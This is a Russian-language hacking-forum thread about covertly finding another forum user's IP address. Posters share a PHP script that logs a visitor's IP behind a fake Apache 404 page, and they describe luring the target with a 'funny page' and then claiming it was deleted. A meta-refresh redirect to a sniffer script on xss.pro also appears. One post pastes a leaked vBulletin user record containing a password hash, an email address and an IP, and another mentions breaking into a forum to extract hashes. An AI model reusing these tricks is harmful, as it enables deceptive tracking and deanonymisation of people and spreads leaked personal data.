• XSS.stack #1 – первый литературный журнал от юзеров форума

Можноли как нить узнать айпишник, юзера на форуме.

Отслеживать
достаешь хэши ( вних написан ИП) tongue.gif
ты хоть понял, что сказал? :bang:

а чем не катит старый способ дать линк на страницу со скориптом?
+1.

Код: 
<?php
$f = fopen("log.txt", "w");
fwrite($f, "Ламак попался: ".$_SERVER['REMOTE_ADDR']);
fclose($f);
?>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL <?php echo $_SERVER['REQUEST_URI'];?> was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.33 Server at <?php echo $_SERVER['HTTP_HOST'];?> Port <? echo $_SERVER['SERVER_PORT'];?></ADDRESS>
</BODY></HTML>
 
ты хоть понял, что сказал?
Да понял! Вот смотри, я выдрал хэш из бюллетина:
Код: 
INSERT INTO vb_user VALUES('30','2','','0','r-PORNO-EXE-r','57e22d848ce00e831689aed3c90efa1e','2006-07-05','qweds444@mail.ru','0','','','','','','','','1','0','Junior Member','0','1152060950','0','1152060950','1152060978','1152060976','0','10','5','-12','0','0','0','0','3159','','0000-00-00','-1','-1','81.179.29.57','0','2','0','0','-1','0','0',',GD');
Что у нас '81.179.29.57' ? это ведь не ИП да? :fuck:
 
VaNeSh:
Еще есть очень замудренный способ - ломаешь форум, достаешь хэши ( вних написан ИП) tongue.gif
ты сказал что в самом хеше содержится ип втовремя как в нем содержится зашифрованый пароль
 
я выдрал хэш из бюллетина:
Бля, это не хеш, а строка таблицы. Не тупи.
И не груби мне, минус получишь.

Еще есть очень замудренный способ - ломаешь форум, достаешь хэши ( вних написан ИП) tongue.gif
Хеш - уникальная однозначная последовательность, полученная из пароля. Учи матчасть
 
Great
А зачем так много писать? Разве этого

Код: 
<?php
$f = fopen("log.txt", "w");
fwrite($f, "Ламак попался: ".$_SERVER['REMOTE_ADDR']);
fclose($f);
?>
Не хватает? Или остальное для убедительности?

Ламак попался
:)
 
cxz
Программ?
То ты спрашиваешь ip пользователя на форуме то программы какие то.
Может тебе дать программу где вписываешь адрес форума и логин юзера а она тебе ip его выдаёт?
 
iLLuZionist
Дальше код ошибки 404 апача, чтобы юзер ниче не заподозрил :)
Типа говоришь ему, что прикольную страничку нашел. Даешь ему линк. Он видит 404, ты ему что-нить в роде "уже удалили =(" :)
Добавлено в [time]1162357529[/time]
Может тебе дать программу где вписываешь адрес форума и логин юзера а она тебе ip его выдаёт?
Случайно не "кряке интернета" называется? :lol:
 
Great
Дальше код ошибки 404 апача, чтобы юзер ниче не заподозрил :)
Типа говоришь ему, что прикольную страничку нашел. Даешь ему линк. Он видит 404, ты ему что-нить в роде "уже удалили =(" :)
Именно это я и подрузомевал под
для убедительности?
:)

А за скрипт спс - пригодится для изучения C.И. в php :lol:
 
То ты спрашиваешь ip пользователя на форуме то программы какие то.
Может тебе дать программу где вписываешь адрес форума и логин юзера а она тебе ip его выдаёт?
давай выложи :huh:
 
Регим сайт на narod.ru.Пихаем туда html'ку с таким кодом:

Код: 
<meta http-equiv="refresh" content="1;url= http://xss.pro/sources/sniff/sniff.php">
страничку называем "images.html" чуваг заходит и его сразу кидает на сниффак)
Лог Тут.
Смотрим с какой страницы пришел чел - к примеру наш подопечный долген прийти с http://твой сайт.narod.ru/images.html...
Там и будет IP)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх